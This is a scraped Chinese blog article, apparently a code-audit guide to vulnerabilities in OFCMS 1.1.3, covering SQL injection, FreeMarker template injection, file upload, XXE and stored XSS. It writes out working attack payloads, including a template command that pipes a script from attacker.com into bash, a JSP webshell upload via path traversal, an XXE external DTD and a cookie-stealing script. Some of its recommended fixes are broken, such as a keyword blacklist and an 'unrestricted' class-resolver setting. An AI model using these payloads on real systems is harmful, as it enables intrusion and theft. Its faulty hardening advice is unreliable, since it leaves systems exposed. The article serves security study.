当前位置：首页 > article >正文

【Java代码审计实战】OFCMS 1.1.3漏洞挖掘与复现指南

article 2026/3/23 21:47:54

1. OFCMS 1.1.3环境搭建实战搞Java代码审计的第一步永远是搭建测试环境。我花了三天时间折腾OFCMS 1.1.3的环境搭建踩过的坑比想象中多得多。这个CMS的自动安装功能基本就是个摆设最后还是得靠手动部署。下面把我验证过的完整流程分享给大家跟着做能省下至少80%的折腾时间。1.1 项目获取与基础配置源码仓库在Gitee上可以直接克隆git clone -b V1.1.3 https://gitee.com/oufu/ofcms.git用IDEA导入项目时有个关键点必须用Maven方式导入。我最初直接当普通Java项目导入结果依赖全乱套了。导入成功后先别急着启动得处理几个致命配置修改ofcms-admin/pom.xml里的jdk版本默认1.7建议改成你本地版本检查MySQL连接器版本5.x和8.x的驱动类名不同删除ofcms-admin/src/test下的测试用例有些用例会干扰启动1.2 数据库手动部署指南自动安装失败太正常了直接看手动方案。先在MySQL执行CREATE DATABASE ofcms CHARACTER SET utf8mb4; USE ofcms; SOURCE /path/to/ofcms-v1.1.3.sql;重点来了配置文件改名不是简单的重命名需要两步操作把db-config.properties复制一份改名为db.properties修改内容时注意密码加密问题如果密码含特殊字符要用\转义启动时如果报JFinalConfig相关错误试试这个命令mvn clean compile -U1.3 常见启动问题排查我遇到过最恶心的两个问题端口冲突修改ofcms-admin/src/main/webapp/WEB-INF/web.xml里的port标签静态资源加载失败检查SystemUtile.getSiteTemplatePath()返回值是否包含中文路径后台登录地址是http://localhost:8080/ofcms_admin_war/admin/index.html如果404了别慌可能是项目名没识别对试试直接访问/admin路径。2. SQL注入漏洞深度解析2.1 漏洞触发路径追踪这个SQL注入点在后台代码生成功能里特别隐蔽。通过逆向工程定位到关键代码在SystemGenerateController.create()public void create() { String sql getPara(sql); // 直接获取未过滤参数 Db.update(sql); // 动态执行SQL }JFinal框架的Db.update()虽然支持预编译但这里直接把用户输入当完整SQL执行。更危险的是这个方法在Before拦截器里居然被放行了。2.2 漏洞利用实战技巧报错注入payload需要点小技巧UPDATE of_cms_link SET link_nameupdatexml(1,concat(0x7e,(SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schemadatabase())),1) WHERE link_id1几个注意点必须用UPDATE语句INSERT会被框架拦截字段值长度有限制用substring()分段获取数据遇到单引号过滤时可以用CHAR()函数绕过2.3 防御方案对比对比三种修复方式的效果方案实现难度安全性性能影响预编译占位符低高无SQL关键词过滤中中轻微存储过程封装高高中等实测发现最简单的修复是在Controller里加这行if(sql.contains(select) || sql.contains(union)) throw new RuntimeException(非法操作);3. SSTI模板注入攻防3.1 FreeMarker引擎漏洞原理在pom.xml里发现用的是FreeMarker 2.3.23这个版本存在模板注入风险。漏洞触发链是这样的后台修改模板内容时TemplateController.save()直接接收原始输入fileContent.replace()处理存在缺陷只做了基本HTML解码模板渲染时自动执行恶意表达式3.2 漏洞利用花样玩法除了弹计算器这种基础操作还可以#assign rtObject().getClass().forName(java.lang.Runtime).getRuntime() ${ rt.exec(curl http://attacker.com/shell.sh | bash) }更隐蔽的利用方式是用TemplateModel接口实现内存马#assign classloaderObject().getClass().getClassLoader() #assign clazzclassloader.loadClass(metasploit.Payload) ${ clazz.newInstance() }3.3 防御方案实测试了三种防护方法升级FreeMarker到2.3.31部分语法仍可执行配置TemplateExceptionHandler.RETHROW_HANDLER会破坏正常功能自定义TemplateLoader过滤危险标签推荐方案最终采用的方案是在freemarker.properties中加入template_exception_handlerrethrow new_builtin_class_resolverunrestricted4. 文件上传漏洞的花式利用4.1 漏洞点代码审计同一个TemplateController.save()方法里藏着文件上传漏洞关键问题在File file new File(pathFile, fileName); // 未校验路径穿越 FileUtils.writeString(file, fileContent); // 直接写入内容利用条件比想象中宽松不需要登录某些版本存在鉴权绕过允许上传任意后缀文件目录穿越可达web根目录4.2 冰蝎马植入实战上传jsp马时有个坑必须用URL编码后的内容。推荐用Burp的Decoder模块处理原始jsp代码 → URL编码全选编码修改file_name../../../static/shell.jsp注意路径深度用../../测试到正确层数连接时如果500报错可能是文件编码问题尝试UTF-8 without BOM路径权限问题检查tomcat的webapps目录权限冰蝎版本不匹配试试3.0或4.04.3 防御方案对比测试测试了三种防护方案文件内容校验容易被绕过白名单后缀过滤影响业务功能文件存储分离推荐方案最终采用的安全配置// 在FileUtils.writeString前添加校验 if(fileName.contains(../) || !fileName.endsWith(.html)) { throw new SecurityException(非法文件名); }5. XXE与存储型XSS漏洞挖掘5.1 XXE漏洞利用链分析ReprotAction.expReport()方法的危险调用链JasperCompileManager.compileReport() → JRXmlLoader.load() → Digester.parse() // 未禁用外部实体利用时需要先上传恶意jrxml文件!DOCTYPE xxe [!ENTITY % remote SYSTEM http://attacker.com/evil.dtd%remote;] rootexfil;/root5.2 存储型XSS的持久化攻击新闻评论处的XSS特别适合钓鱼scriptnew Image().srchttp://attacker.com/steal?cookiedocument.cookie/script在审计时发现更危险的DOM型XSSeval(location.hash.slice(1)); // 可通过#alert(1)触发5.3 综合防御建议在web.xml添加全局过滤器filter filter-namexssFilter/filter-name filter-classcom.ofsoft.cms.filter.XssFilter/filter-class /filter数据库层防御StringEscapeUtils.escapeHtml4(content); // 入库前转义响应头加固response.setHeader(X-XSS-Protection, 1; modeblock);

【Java代码审计实战】OFCMS 1.1.3漏洞挖掘与复现指南

相关文章：

【Java代码审计实战】OFCMS 1.1.3漏洞挖掘与复现指南

2026年AI音乐创作工具推荐：让每个人都能成为作曲家

为什么关闭Git的SSL验证是下策？安全工程师教你正确处理证书错误

Kettle实战100篇第11篇 JavaScript脚本中日志级别与调试技巧

面向智能仓储的动态建模与空间计算融合技术体系构建研究—— 基于 Pixel-to-Space 的三维轨迹建模与行为认知方法体系

海康VisionMaster实战笔记：从零搭建字符识别与TCP通信方案

HY-Motion 1.0保姆级教程：日志分析+性能监控+错误定位全链路

当波束成形遇上导向矢量失配：特征子空间投影法如何成为你的‘纠偏’利器？

分享一个基于MCU实现智能陪伴时钟的项目

避坑指南：Jenkins连接Nexus3常见7大错误排查（含SSL配置/凭据失效/仓库路径错误）

从Dockerfile到健康检查：给你的.NET Core WebApi容器加点‘企业级’配置

ICM45605六轴IMU驱动开发：APEX算法与FIFO中断实战

探索基于超螺旋滑模观测器的永磁同步电机无位置传感器控制策略

探秘TSMC 40nm工艺库

架构实战：机房轮式巡检机器人梯控的非侵入式边缘解耦设计

灰狼算法实现部分遮阴下的MPPT跟踪探索

机器学习入门：如何用Python实现概念学习（Concept Learning）的完整流程

二线城市二本毕业生，工作清闲的我考过CDA数据分析师一级，顺利转行零售集团运营岗

HTML+CSS+JS打造动态新年倒计时网页（附完整源码）

读了libstdc++ std::vector源码，发现你的push_back可能比你想象的慢10倍——6个隐藏的性能陷阱

【实战指南】CCPD数据集车牌检测框坐标解析与YOLO格式转换技巧

华为OD机考双机位C卷 - 文件缓存系统（Java）

视频查重神器 vs 传统算法：实测3种工具在二次剪辑检测中的表现差异

华为OD机考双机位C卷 - 文件存储系统的排序（Java）

MONAI实战：5分钟搞定医学影像分割的增强版UNet配置

常见的数据泄露风险与保密与防范策略，一文详解！

保姆级教程：在RK3588上部署多模型YOLOv5，用QuickRun实现25FPS高并发推理

浅谈密码学（一）基础知识

手把手教你用Dify的Rookie插件连接MySQL，给AI装上‘数据透视’的眼睛（Spring Boot做数据源）

青龙面板抓包实战：VMOS虚拟机与小黄鸟完美配合指南